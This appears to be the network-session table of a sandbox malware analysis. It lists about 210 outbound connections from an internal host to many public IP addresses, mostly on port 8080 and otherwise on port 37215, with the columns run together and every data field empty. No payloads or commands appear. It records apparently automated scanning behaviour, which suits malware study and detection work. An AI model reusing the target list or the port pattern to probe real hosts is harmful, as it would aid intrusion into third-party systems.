                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7536192.168.2.2356592118.148.42.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7537192.168.2.2356076197.61.82.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7538192.168.2.233858641.86.161.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7539192.168.2.2333524171.253.169.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7540192.168.2.2358194157.144.255.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7541192.168.2.235913641.42.169.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7542192.168.2.234334441.32.24.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7543192.168.2.234271241.134.182.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7544192.168.2.2359780157.139.92.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7545192.168.2.2345710157.87.51.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7546192.168.2.2340202197.220.197.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7547192.168.2.2347836157.127.151.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7548192.168.2.2343276220.12.104.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7549192.168.2.2340422157.160.16.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7550192.168.2.2350080191.140.146.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7551192.168.2.235901844.109.227.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7552192.168.2.234051840.177.147.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7553192.168.2.2349602190.175.123.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7554192.168.2.2341816104.18.248.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7555192.168.2.234505071.227.113.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7556192.168.2.2347612142.250.220.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7557192.168.2.2350334182.107.67.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7558192.168.2.234585085.167.9.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7559192.168.2.2353726208.220.222.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7560192.168.2.2333118108.39.194.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7561192.168.2.23516285.58.187.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7562192.168.2.236017812.99.140.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7563192.168.2.233604493.148.247.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7564192.168.2.2360484117.77.206.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7565192.168.2.2352010137.255.61.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7566192.168.2.2345864121.99.69.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7567192.168.2.2341466191.41.105.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7568192.168.2.2349720181.139.50.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7569192.168.2.23339442.115.59.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7570192.168.2.2353694130.63.114.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7571192.168.2.2333838112.236.94.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7572192.168.2.2344378198.16.165.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7573192.168.2.2342628216.157.5.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7574192.168.2.2355782211.201.140.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7575192.168.2.235937660.73.55.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7576192.168.2.236042836.56.206.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7577192.168.2.235765413.196.0.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7578192.168.2.233357835.153.101.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7579192.168.2.2348850148.188.125.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7580192.168.2.2334372140.79.94.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7581192.168.2.235779427.84.80.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7582192.168.2.234545244.13.11.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7583192.168.2.235051477.46.90.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7584192.168.2.2357004165.131.238.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7585192.168.2.233926493.242.67.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7586192.168.2.2355534204.181.230.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7587192.168.2.2355350199.86.70.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7588192.168.2.2343882102.220.68.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7589192.168.2.2335184187.97.21.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7590192.168.2.2353318203.144.135.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7591192.168.2.2341076197.77.185.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7592192.168.2.2358734177.222.21.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7593192.168.2.2359192147.209.129.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7594192.168.2.2333960137.24.232.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7595192.168.2.2344258188.234.94.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7596192.168.2.2342996219.87.47.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7597192.168.2.2360164153.183.214.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7598192.168.2.2334168222.63.211.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7599192.168.2.2345474169.137.241.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7600192.168.2.2347108210.18.158.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7601192.168.2.2340710177.152.92.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7602192.168.2.233411039.148.222.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7603192.168.2.2358420191.227.203.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7604192.168.2.2346050183.250.95.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7605192.168.2.2333266121.179.208.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7606192.168.2.235018235.80.192.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7607192.168.2.2341572217.171.128.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7608192.168.2.234791231.146.36.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7609192.168.2.2347756123.168.92.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7610192.168.2.233526240.48.91.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7611192.168.2.2335516154.156.124.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7612192.168.2.2334792148.105.161.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7613192.168.2.233402677.61.187.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7614192.168.2.2355588117.201.241.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7615192.168.2.2344374180.232.220.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7616192.168.2.2351840196.102.229.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7617192.168.2.2347804150.36.154.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7618192.168.2.235690852.174.25.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7619192.168.2.2356560191.255.191.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7620192.168.2.235400048.248.248.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7621192.168.2.234574061.23.59.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7622192.168.2.2337782188.11.93.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7623192.168.2.2337142131.163.183.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7624192.168.2.2339758192.25.77.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7625192.168.2.2350610152.181.94.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7626192.168.2.2336048145.172.182.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7627192.168.2.2344002223.98.177.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7628192.168.2.2337904208.179.39.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7629192.168.2.2345536126.222.255.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7630192.168.2.2341060196.253.99.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7631192.168.2.233470820.192.199.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7632192.168.2.2349510122.101.107.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7633192.168.2.235283845.95.37.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7634192.168.2.234240217.161.57.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7635192.168.2.2346754155.235.61.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7636192.168.2.2358052210.72.89.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7637192.168.2.2339276199.74.94.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7638192.168.2.2340922181.162.66.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7639192.168.2.2343374172.92.26.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7640192.168.2.234383039.42.115.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7641192.168.2.2359670141.96.24.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7642192.168.2.2345988114.117.168.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7643192.168.2.2344826132.46.51.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7644192.168.2.2350464178.56.249.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7645192.168.2.234093497.194.173.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7646192.168.2.2332950199.146.60.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7647192.168.2.233992220.211.145.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7648192.168.2.235804265.161.248.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7649192.168.2.2360116184.229.118.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7650192.168.2.2360318144.63.26.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7651192.168.2.23541685.222.44.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7652192.168.2.2351744131.107.76.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7653192.168.2.2356196150.93.19.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7654192.168.2.2353046149.242.4.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7655192.168.2.2358828187.110.181.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7656192.168.2.2348266218.32.166.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7657192.168.2.234878090.70.210.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7658192.168.2.234661248.114.106.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7659192.168.2.2347852122.104.158.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7660192.168.2.234134660.163.132.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7661192.168.2.2353790176.202.5.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7662192.168.2.2357168119.121.71.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7663192.168.2.2341966191.6.92.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7664192.168.2.235209478.208.117.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7665192.168.2.233627096.144.47.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7666192.168.2.2358590155.123.3.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7667192.168.2.2360546157.166.233.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7668192.168.2.2354798107.176.108.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7669192.168.2.2350180178.220.197.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7670192.168.2.235891888.135.167.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7671192.168.2.235956698.224.113.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7672192.168.2.2352882165.205.109.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7673192.168.2.2356612131.36.107.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7674192.168.2.234103698.31.206.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7675192.168.2.2354286199.60.69.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7676192.168.2.2336408109.118.190.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7677192.168.2.2355084166.17.107.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7678192.168.2.235094068.165.129.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7679192.168.2.235948073.28.69.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7680192.168.2.23353541.206.196.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7681192.168.2.233427844.76.24.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7682192.168.2.235436459.32.121.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7683192.168.2.235751814.144.191.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7684192.168.2.234433048.23.210.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7685192.168.2.2336272158.126.58.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7686192.168.2.2356786141.238.252.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7687192.168.2.234108043.13.118.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7688192.168.2.2333428141.149.113.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7689192.168.2.2353488200.179.21.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7690192.168.2.2350054212.165.154.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7691192.168.2.2337326178.57.125.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7692192.168.2.2360256209.131.244.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7693192.168.2.234949873.98.223.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7694192.168.2.235285645.249.109.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7695192.168.2.2350496150.173.118.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7696192.168.2.2344364203.90.218.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7697192.168.2.2341278150.150.120.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7698192.168.2.2348442172.149.78.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7699192.168.2.235232235.157.50.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7700192.168.2.2360390105.255.253.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7701192.168.2.2347358126.125.201.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7702192.168.2.2349564135.62.117.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7703192.168.2.2333546157.165.175.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7704192.168.2.234514441.235.242.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7705192.168.2.2355406157.23.59.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7706192.168.2.2336342197.137.113.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7707192.168.2.2359400197.200.155.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7708192.168.2.234917241.26.37.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7709192.168.2.234183241.205.139.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7710192.168.2.234794041.14.127.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7711192.168.2.2344950197.69.149.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7712192.168.2.236007241.15.248.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7713192.168.2.2357220157.254.238.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7714192.168.2.23502785.28.72.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7715192.168.2.2337088114.43.225.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7716192.168.2.2358390197.204.124.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7717192.168.2.2356126157.175.170.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7718192.168.2.2343160197.66.201.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7719192.168.2.235855041.42.246.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7720192.168.2.233954041.146.19.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7721192.168.2.2349826157.241.108.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7722192.168.2.2332856157.254.24.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7723192.168.2.2358436157.5.190.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7724192.168.2.2342752157.116.108.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7725192.168.2.2341126132.91.223.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7726192.168.2.2349982186.52.130.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7727192.168.2.234247641.71.119.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7728192.168.2.235694841.117.242.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7729192.168.2.2354112157.44.101.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7730192.168.2.234438641.187.222.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7731192.168.2.2357268101.87.226.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7732192.168.2.2354198157.170.237.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7733192.168.2.2355058197.144.158.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7734192.168.2.233429665.59.0.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7735192.168.2.2333508197.3.119.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7736192.168.2.2344738198.121.78.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7737192.168.2.233725441.226.243.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7738192.168.2.2357358100.6.4.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7739192.168.2.2350622169.137.172.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7740192.168.2.2339822157.207.248.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7741192.168.2.235235641.83.192.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7742192.168.2.2342508131.145.237.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7743192.168.2.23461208.107.108.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7744192.168.2.233416641.144.21.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7745192.168.2.2352428197.216.116.15537215
                                                        TimestampBytes transferredDirectionData


